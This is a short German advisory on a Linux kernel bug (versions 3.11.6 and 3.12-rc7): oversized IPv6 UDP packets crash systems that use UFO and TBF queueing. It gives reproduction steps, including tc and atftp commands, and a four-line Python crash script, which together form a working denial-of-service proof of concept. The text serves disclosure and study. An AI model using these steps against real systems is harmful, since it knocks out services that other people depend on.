Eine Sicherheitslücke im Linux-Kernel hat zur Folge, dass ein lokaler oder entfernter Angreifer Denial-of-Service-Attacken ausführen kann.
Das Problem tritt beim Verarbeiten speziell konstruierter UDP-Netzwerkpakete auf, die zu groß sind und via IPv6 verschickt werden. Daraufhin stürzt der Kernel ab. Anfällig hierfür sind Netzwerksysteme, die UFO aktiviert haben und Token Bucket Filter (TBF) als Queueing Discipline verwenden. Die eigentliche Attacke kann der Angreifer dann beispielsweise über TFTP ausführen.
Die Attacke lässt sich mit folgenden Schritten nachvollziehen:
1. Linux System mit UDP UFO aufsetzen (z.B. virtio_net):
# ethtool -k eth0 | grep udp-frag
2. Eine IPv6-Adresse zuweisen:
# ip addr show dev eth0 | grep inet6
3. Queueing Discipline zu TBF ändern:
# tc qdisc replace dev eth0 root tbf rate 200kbit latency 20ms burst 5kb
4. TFTP-Daemon starten (z.B. tftp-hpa)
# in.tftpd -6 -l -s /srv/tftp
5. Kernel angreifen durch spezielles UDP Paket:
# atftp --option "blksize 5000" -g -r file1 fd00:abcd:abcd:123::2 69
Lokale Angreifer können das System auch mit folgendem Python-Skript zum Absturz bringen:
#!/usr/bin/python
import socket
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, 0)
sock.sendto("A"*5000, ('fd00:abcd:abcd:123::3', 1234, 0, 0))
Die Attacke lässt sich mit den Kernelversionen 3.11.6 und 3.12-rc7 erfolgreich durchführen.

